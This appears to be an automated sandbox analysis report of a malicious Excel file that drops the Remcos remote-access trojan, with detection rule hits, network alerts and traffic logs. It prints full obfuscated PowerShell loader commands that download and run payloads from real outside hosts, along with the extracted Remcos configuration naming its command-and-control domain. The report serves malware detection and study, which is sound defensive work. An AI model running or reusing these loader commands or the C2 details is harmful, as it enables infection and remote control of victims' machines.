                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3760, TargetFilename: C:\Users\user\AppData\Local\Temp\b53lag2c\b53lag2c.cmdline
                  Sigma detected: Modification of IE Registry Settings
                  Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3356, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\sYSTeM32\WinDowSPOWeRSHelL\V1.0\PoWersHell.Exe" "pOWerSHeLL.EXe -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE ; iEx($(Iex('[sYsTEm.TEXt.ENCodinG]'+[ChAr]0X3A+[Char]0x3A+'uTf8.GetSTRiNg([SYSTeM.ConveRt]'+[CHAr]0x3a+[ChAR]0X3A+'FROMBASE64StRING('+[cHaR]0x22+'JHZiS3kyVzJoWiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJEZUZJbml0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1hS29BY2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNNTlFvZnJsUUUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhadFZYTk9QLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVExxUHptVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHRMKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ1QUl0R1YiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2lsZGJGTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR2Ykt5MlcyaFo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjM0LjIwNS4xMzUvMTI0NC9jcmVhdGdvb2RpZGVhZm9yZnV0dXJlYnVzaW5lc3NkZXZlbG9wd2l0aG5pY2V0aGluZ3NnZXRiYWNrb24udElGIiwiJEVOVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIiwwLDApO3N0QVJULVNsRWVwKDMpO0lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIg=='+[ChAR]0x22+'))')))", CommandLine: "C:\Windows\sYSTeM32\WinDowSPOWeRSHelL\V1.0\PoWersHell.Exe" "pOWerSHeLL.EXe -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE ; iEx($(Iex('[sYsTEm.TEXt.ENCodinG]'+[ChAr]0X3A+[Char]0x3A+'uTf8.GetSTRiNg([SYSTeM.ConveRt]'+[CHAr]0x3a+[ChAR]0X3A+'FROMBASE64StRING('+[cHaR]0x22+'JHZiS3kyVzJoWiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJEZUZJbml0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1hS29BY2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNNTlFvZnJsUUUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhadFZYTk9QLHVpbnQgICAgICAgICAgICAgICAgICAgI
                  Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('nErimageUrl = ZM5https://3105.filemail.com/api/file/get?fil'+'ekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-'+'dviTK5cARaNdQ'+'jbb3mexfwQzKmTXg'+'&skipreg=true&pk_vid'+'=e0109638c9bfb9571732531309b5ff7c Z'+'M5;nErwe'+'bClient = New-Object System.Net.WebC'+'lient;nErimageBytes = nErwebClient.DownloadData('+'nErimageUrl);nErimageText = ['+'System.Text.Encoding]::UTF8.GetStr'+'ing(nErimageBy'+'tes);nErstartFlag ='+' ZM5<<BASE64_START>>ZM5'+';nErendFlag = ZM5<<BASE64_'+'END>>ZM5;nErstartIndex = nErimageTex'+'t.IndexOf(nErstartFlag);nErendInd'+'ex = nErimageText.IndexOf('+'nErendFlag);nE'+'rstartIn'+'dex -ge 0 -and nErendIndex -gt nErstartIndex;nErstartIndex += nErstartFlag.Length;nErbase64'+'L'+'ength = nErendInde'+'x - nErsta'+'rtIndex;nErbase64Command = nErimageText.Substring(nErstartIndex, nErbase64Length'+');nErbase64Reversed = -join (nErba'+'se64Command.ToCharArray() JI6 ForEach'+'-Object { nEr_ })[-1..-(nErbase64Command.Length)];nErcommandBytes = [System.Convert]::'+'FromBas'+'e64String(nErbase64Reversed);nErloadedAssembly = [System.Reflection.Assembly]::Load(nErcommandBytes);nErvaiMethod = [dnlib.IO.Home].GetMethod'+'(ZM5VAIZM5);nErvaiMethod.Invoke(nErnull, @(ZM5txt.RSRVRS/'+'4421/531.5'+'02.432.271//:ptthZM5, ZM5'+'desativadoZM5, ZM5desativadoZM5, ZM5desativadoZM'+'5, ZM5CasPolZM5, ZM5desativadoZM5, ZM5desativadoZM5,ZM5desativadoZM5,Z'+'M5desativadoZ'+'M5,ZM5desativado'+'ZM'+'5,ZM5desativadoZM5,ZM5desativad'+'oZM5'+',ZM51ZM5,ZM5desativadoZM5));') -RePlacE ([char]110+[char]69+[char]114),[char]36-CReplAcE 'ZM5',[char]39 -RePlacE([char]74+[char]73+[char]54),[char]124)|& ( $pSHOME[4]+$PShOME[30]+'x')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('nErimageUrl = ZM5https://3105.filemail.com/api/file/get?fil'+'ekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-'+'dviTK5cARaNdQ'+'jbb3mexfwQzKmTXg'+'&skipreg=true&pk_vid'+'=e0109638c9bfb9571732531309b5ff7c Z'+'M5;nErwe'+'bClient = New-Object System.Net.WebC'+'lient;nErimageBytes = nErwebClient.DownloadData('+'nErimageUrl);nErimageText = ['+'System.Text.Encoding]::UTF8.GetStr'+'ing(nErimageBy'+'tes);nErstartFlag ='+' ZM5<<BASE64_START>>ZM5'+';nErendFlag = ZM5<<BASE64_'+'END>>ZM5;nErstartIndex = nErimageTex'+'t.IndexOf(nErstartFlag);nErendInd'+'ex = nErimageText.IndexOf('+'nErendFlag);nE'+'rstartIn'+'dex -ge 0 -and nErendIndex -gt nErstartIndex;nErstartIndex += nErstartFlag.Length;nErbase64'+'L'+'ength = nErendInde'+'x - nErsta'+'rtIndex;nErbase64Command = nErimageText.Substring(nErstartIndex, nErbase64Length'+');nErbase64Reversed = -join (nErba'+'se64Command.ToCharArray() JI6 ForEach'+'-Object { nEr_ })[-1..-(nErbase64Command.Length)];nErcommandBytes = [System.Convert]::'+'FromBas'+'e64String(nErbase64Reversed);nErloadedAssembly = [System.Reflection.Assembly]::Load(nE
                  Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3760, TargetFilename: C:\Users\user\AppData\Local\Temp\ujcyfur4.fse.ps1

                  Data Obfuscation

                  barindex
                  Sigma detected: Dot net compiler compiles file from suspicious location
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b53lag2c\b53lag2c.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b53lag2c\b53lag2c.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\sYSTeM32\WinDowSPOWeRSHelL\V1.0\PoWersHell.Exe" "pOWerSHeLL.EXe -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE ; iEx($(Iex('[sYsTEm.TEXt.ENCodinG]'+[ChAr]0X3A+[Char]0x3A+'uTf8.GetSTRiNg([SYSTeM.ConveRt]'+[CHAr]0x3a+[ChAR]0X3A+'FROMBASE64StRING('+[cHaR]0x22+'JHZiS3kyVzJoWiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJEZUZJbml0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1hS29BY2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNNTlFvZnJsUUUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhadFZYTk9QLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVExxUHptVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHRMKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ1QUl0R1YiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2lsZGJGTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR2Ykt5MlcyaFo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjM0LjIwNS4xMzUvMTI0NC9jcmVhdGdvb2RpZGVhZm9yZnV0dXJlYnVzaW5lc3NkZXZlbG9wd2l0aG5pY2V0aGluZ3NnZXRiYWNrb24udElGIiwiJEVOVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIiwwLDApO3N0QVJULVNsRWVwKDMpO0lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIg=='+[ChAR]0x22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3760, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b53lag2c\b53lag2c.cmdline", ProcessId: 3992, ProcessName: csc.exe

                  Stealing of Sensitive Information

                  barindex
                  Sigma detected: Remcos
                  Source: Registry Key setAuthor: Joe Security: Data: Details: 8C 9E 01 F6 40 A6 1B 23 71 3A E3 43 96 02 9A 3D 12 55 5E 57 F8 34 20 57 E8 C9 4A 24 96 5B 1E 45 E9 C6 62 E9 B9 EC 58 FB 57 9D 14 15 0B 82 57 4B E1 27 38 DB 67 19 8B 55 10 D9 70 F5 74 E5 CE E8 3C F1 71 A5 45 90 C9 A7 E4 E8 81 A6 E6 98 A2 6C 74 65 CC 98 7D 19 5B DD 86 E5 22 6D 44 EC 05 C0 DB FC ED 17 FA 00 0F 61 A7 7E 59 2D 9E 5D BE AC A5 68 , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, ProcessId: 3984, TargetObject: HKEY_CURRENT_USER\Software\Rmc-H42H13\exepath

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-25T14:06:37.319565+010020241971A Network Trojan was detected172.234.205.13580192.168.2.2249162TCP
                  2024-11-25T14:06:41.971767+010020241971A Network Trojan was detected172.234.205.13580192.168.2.2249164TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-25T14:06:37.319515+010020244491Attempted User Privilege Gain192.168.2.2249162172.234.205.13580TCP
                  2024-11-25T14:06:41.846744+010020244491Attempted User Privilege Gain192.168.2.2249164172.234.205.13580TCP
                  2024-11-25T14:07:02.412468+010020244491Attempted User Privilege Gain192.168.2.2249171172.234.205.13580TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-25T14:07:21.342228+010020204251Exploit Kit Activity Detected172.234.205.13580192.168.2.2249173TCP
                  2024-11-25T14:07:35.806679+010020204251Exploit Kit Activity Detected172.234.205.13580192.168.2.2249177TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-25T14:07:21.342228+010020204241Exploit Kit Activity Detected172.234.205.13580192.168.2.2249173TCP
                  2024-11-25T14:07:35.806679+010020204241Exploit Kit Activity Detected172.234.205.13580192.168.2.2249177TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-25T14:07:24.964712+010020365941Malware Command and Control Activity Detected192.168.2.224917431.13.224.722412TCP
                  2024-11-25T14:07:27.766398+010020365941Malware Command and Control Activity Detected192.168.2.224917531.13.224.722412TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-25T14:06:33.524346+010020576351A Network Trojan was detected172.234.205.13580192.168.2.2249177TCP
                  2024-11-25T14:06:33.524346+010020576351A Network Trojan was detected172.234.205.13580192.168.2.2249173TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-25T14:07:05.115920+010020490381A Network Trojan was detected193.30.119.205443192.168.2.2249168TCP
                  2024-11-25T14:07:20.951958+010020490381A Network Trojan was detected193.30.119.205443192.168.2.2249172TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-25T14:07:28.439430+010028033043Unknown Traffic192.168.2.2249176178.237.33.5080TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-25T14:06:33.524346+010028582951A Network Trojan was detected172.234.205.13580192.168.2.2249177TCP
                  2024-11-25T14:06:33.524346+010028582951A Network Trojan was detected172.234.205.13580192.168.2.2249173TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-25T14:06:49.776281+010028587951A Network Trojan was detected192.168.2.2249165172.234.205.13580TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: 00000023.00000002.543234045.0000000000505000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["newbeggin.duckdns.org:2412:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-H42H13", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                  Multi AV Scanner detection for submitted file
                  Source: OC25-11-24.xlsReversingLabs: Detection: 15%
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 35.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 35.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000023.00000002.543234045.0000000000505000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000023.00000002.542292669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 3784, type: MEMORYSTR
                  Machine Learning detection for sample
                  Source: OC25-11-24.xlsJoe Sandbox ML: detected
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,30_2_00404423
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,35_2_0043293A
                  Source: CasPol.exeBinary or memory string: -----BEGIN PUBLIC KEY-----

                  Exploits

                  barindex
                  Yara detected UAC Bypass using CMSTP
                  Source: Yara matchFile source: 35.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 35.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000023.00000002.542292669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 3784, type: MEMORYSTR

                  Privilege Escalation

                  barindex
                  Contains functionality to bypass UAC (CMSTPLUA)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_00406764 _wcslen,CoGetObject,35_2_00406764

                  Phishing

                  barindex
                  Yara detected HtmlPhish44
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\nicewithgoodthingswhichgosofargoodforeerybody[1].hta, type: DROPPED
                  Source: unknownHTTPS traffic detected: 193.30.119.205:443 -> 192.168.2.22:49168 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 193.30.119.205:443 -> 192.168.2.22:49172 version: TLS 1.0
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: unknownHTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49161 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49163 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49169 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49170 version: TLS 1.2
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ovqlooon\ovqlooon.pdbhP source: powershell.exe, 00000012.00000002.486539543.000000000284C000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\b53lag2c\b53lag2c.pdb source: powershell.exe, 00000005.00000002.448423237.00000000024E1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ovqlooon\ovqlooon.pdb source: powershell.exe, 00000012.00000002.486539543.00000000022FB000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\b53lag2c\b53lag2c.pdbhP source: powershell.exe, 00000005.00000002.448423237.00000000024E1000.00000004.00000800.00020000.00000000.sdmp
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_0040AE51 FindFirstFileW,FindNextFileW,30_2_0040AE51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,31_2_00407EF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 33_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,33_2_00407898
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,35_2_0040B335
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,35_2_0041B42F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,35_2_0040B53A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_0044D5E9 FindFirstFileExA,35_2_0044D5E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,35_2_004089A9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_00406AC2 FindFirstFileW,FindNextFileW,35_2_00406AC2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,35_2_00407A8C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,35_2_00418C69
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,35_2_00408DA7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,35_2_00406F06
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\

                  Software Vulnerabilities

                  barindex
                  Document exploit detected (process start blacklist hit)
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe
                  Suspicious execution chain found
                  Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Source: global trafficDNS query: name: provit.uk
                  Source: global trafficDNS query: name: provit.uk
                  Source: global trafficDNS query: name: provit.uk
                  Source: global trafficDNS query: name: provit.uk
                  Source: global trafficDNS query: name: provit.uk
                  Source: global trafficDNS query: name: provit.uk
                  Source: global trafficDNS query: name: 3105.filemail.com
                  Source: global trafficDNS query: name: provit.uk
                  Source: global trafficDNS query: name: 3105.filemail.com
                  Source: global trafficDNS query: name: provit.uk
                  Source: global trafficDNS query: name: provit.uk
                  Source: global trafficDNS query: name: 3105.filemail.com
                  Source: global trafficDNS query: name: 3105.filemail.com
                  Source: global trafficDNS query: name: newbeggin.duckdns.org
                  Source: global trafficDNS query: name: geoplugin.net
                  Source: global trafficDNS query: name: geoplugin.net
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 193.30.119.205:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 178.237.33.50:80
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
